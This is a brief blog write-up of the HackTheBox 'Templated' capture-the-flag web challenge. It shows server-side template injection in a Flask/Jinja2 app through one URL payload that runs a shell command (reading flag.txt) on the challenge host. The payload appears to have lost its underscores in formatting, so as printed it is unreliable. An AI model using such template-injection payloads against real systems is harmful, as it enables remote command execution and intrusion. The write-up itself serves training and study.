Posted inWeb Challenges

Hackthebox templated web challenge quick writeup

February 19, 2021No Comments
Hackthebox templated web challenge quick writeup
Hackthebox templated web challenge quick writeup
Tweet
Share
Share
Pin
0 Shares
5
(12)

First of all start the instance

Hackthebox templated web challenge quick writeup

On visiting the host we see flask/jinja2.

Hackthebox templated web challenge quick writeup

So I searched for the exploit .

Hackthebox templated web challenge quick writeup

Checking for SSTI

Hackthebox templated web challenge quick writeup

Got an article about SSTI

https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/

Hackthebox templated web challenge quick writeup
http://165.22.124.155:31361/%7B%7Brequest.application.globals.builtins.import('os').popen('cat%20flag.txt').read()%7D%7D
Hackthebox templated web challenge quick writeup

And we got the flag successfully..

How useful was this post?

Click on a star to rate it!

Average rating 5 / 5. Vote count: 12

No votes so far! Be the first to rate this post.

As you found this post useful...

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?

Post Views: 3,463
Tags:
Last updated on February 19, 2021

Comments

No comments yet. Why don’t you start the discussion?

Leave a Reply

Your email address will not be published. Required fields are marked *